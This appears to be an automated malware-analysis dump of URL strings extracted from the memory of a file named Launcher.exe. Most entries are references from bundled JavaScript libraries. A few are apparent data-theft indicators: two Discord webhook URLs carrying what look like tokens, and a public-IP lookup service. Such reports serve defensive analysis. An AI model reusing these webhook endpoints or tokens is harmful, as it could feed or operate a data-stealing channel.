        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278730215.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.000001752651F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278992463.0000017526262000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280187961.0000017526197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-patterns).
        Source: Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-samevaluezero)
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280117601.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278601726.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ecma-international.org/ecma-262/7.0/#sec-tolength).
        Source: Launcher.exe, 00000000.00000003.1537773023.00000175261C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evanjones.ca/)
        Source: Launcher.exe, 00000000.00000003.1385411020.0000019CE43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://feross.org
        Source: Launcher.exe, 00000000.00000003.1233378920.000001752616E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1238048616.000001752616E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227628748.0000017526166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fresc81.github.io/node-winreg
        Source: Launcher.exe, 00000000.00000003.1238316997.0000017526193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/broofa)
        Source: Launcher.exe, 00000000.00000003.1233378920.00000175261AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/mikeal/request
        Source: Launcher.exe, 00000000.00000003.1557876754.00000175264EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/sql-js/sql.js
        Source: Launcher.exe, 00000000.00000003.1557876754.00000175264EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/sql-js/sql.js.git
        Source: Launcher.exe, 00000000.00000003.1437908970.000001752613C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1422146754.0000017526732000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1438701869.0000017525CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/tryghost/node-sqlite3
        Source: Launcher.exe, 00000000.00000003.1238316997.00000175261AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1238316997.0000017526193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jongleberry.com)
        Source: Launcher.exe, 00000000.00000003.1392827074.000000426BF01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.000001752628F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://juliangruber.com
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kevin.vanzonneveld.net
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kevin.vanzonneveld.net)
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1314370569.0000017526604000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1374063380.0000006D5FA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n8.io/)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org/).
        Source: Launcher.exe, 00000000.00000003.1383139729.00000105F8501000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1293055581.00000175265C5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1301065927.00000175265C7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sheetjs.com
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://snipplr.com/view/5945/javascript-numberformat--ported-from-php/
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://snipplr.com/view/5949/format-humanize-file-byte-size-presentation-in-javascript/
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
        Source: Launcher.exe, 00000000.00000003.1557876754.00000175264FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1557876754.00000175264EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/62888/10333
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/679915/how-do-i-test-for-an-empty-javascript-object-from-json/679
        Source: Launcher.exe, 00000000.00000003.1300104935.00000175262EB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1386921235.0000036327841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://substack.net
        Source: Launcher.exe, 00000000.00000003.1314370569.00000175265F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tootallnate.net)
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/jonschlinkert)
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278730215.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.000001752651F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278601726.000001752612D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278992463.0000017526262000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280187961.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://underscorejs.org/LICENSE
        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1231112083.00000175260CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://url.spec.whatwg.org/#urlutils
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
        Source: Launcher.exe, 00000000.00000003.1431465558.0000017529E3E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1435843049.0000017526712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20140401031018/http://rjpower9000.wordpress.com:80/2012/04/09/fun-with-sh
        Source: Launcher.exe, 00000000.00000003.1537773023.00000175261C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://webrsa.cvs.sourceforge.net/viewvc/webrsa/Client/RSAES-OAEP.js?content-type=text%2Fplain:
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-8.6)
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280117601.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278601726.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/7.0/#sec-ecmascript-language-types)
        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1231112083.000001752614F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com)
        Source: Launcher.exe, 00000000.00000003.1530846422.00000175265C8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1566779691.00000175265D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc2315.txt):
        Source: Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.jsfromhell.com)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
        Source: Launcher.exe, 00000000.00000003.1533437253.0000017526415000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1530651360.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.netdealing.com
        Source: Launcher.exe, 00000000.00000003.1520593672.0000017526115000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1510412634.0000020C2CC41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1523795672.00000175262A7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1523795672.00000175262BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1533904020.0000002D2C9C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1515621239.000001752618F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org
        Source: Launcher.exe, 00000000.00000003.1530651360.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/docs/crypto/EVP_BytesToKey.html
        Source: Launcher.exe, 00000000.00000003.1537773023.00000175261C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rsa.com/rsalabs/node.asp?id=2125
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
        Source: Launcher.exe, 00000000.00000003.1273115219.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.syskall.com)
        Source: Launcher.exe, 00000000.00000003.1533437253.0000017526415000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1530651360.000000017A6C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tero.co.uk/des/
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winternet.no)
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: Launcher.exe, 00000000.00000003.1542759857.0000017526156000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3.svg?type=la
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/api/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3.svg?type=sh
        Source: Launcher.exe, 00000000.00000003.1542759857.0000017526156000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3?ref=badge_large
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.fossa.io/projects/git%2Bhttps%3A%2F%2Fgithub.com%2Fmapbox%2Fnode-sqlite3?ref=badge_shiel
        Source: Launcher.exe, 00000000.00000003.1284664317.0000017526287000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.000001752628B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://archiverjs.com/zip-stream/ZipStream.html
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://axios-http.com
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
        Source: Launcher.exe, 00000000.00000003.1249845254.0000017526295000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1254540287.00000175260CD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://camo.githubusercontent.com/6bbd36f4cf5b35a0f11a96dcd2e97711ffc2fb37/68747470733a2f2f662e636c
        Source: Launcher.exe, 00000000.00000003.1262296562.000001752629F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1249845254.0000017526295000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1254540287.00000175260CD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1252239907.00000175260C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://camo.githubusercontent.com/f4810e00e1c5f5f8addbe3e9f49064fd5d102699/68747470733a2f2f662e636c
        Source: Launcher.exe, 00000000.00000003.1316755134.000001752613D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1331721960.0000017526164000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1276863550.0000017526165000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1299535994.000001752615D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227628748.0000017526166000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.0000017526165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com/api/webhooks/1276788778043965460/Orf3jKknL6GAnLBbxaHKrGxT9G-fuDkG7Pp9Ks25
        Source: Launcher.exe, 00000000.00000003.1252239907.00000175260B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caolan.github.io/async/
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coolaj86.com/articles/building-sqlcipher-for-node-js-on-raspberry-pi-2/).
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/7848
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
        Source: Launcher.exe, 00000000.00000003.1532045265.0000012F66401000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7468#section-7
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
        Source: Launcher.exe, 00000000.00000003.1265642804.00000175262C2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1249845254.0000017526295000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1258032982.000001752630E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1247222794.0000030CA43C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/async_function
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526166000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.0000017526165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1276677347420143668/aMHlm0o0ZhGtCul2q9gome8sh0haDj4SJnUPs-KPbbe-9TU
        Source: Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://electronjs.org/headers
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
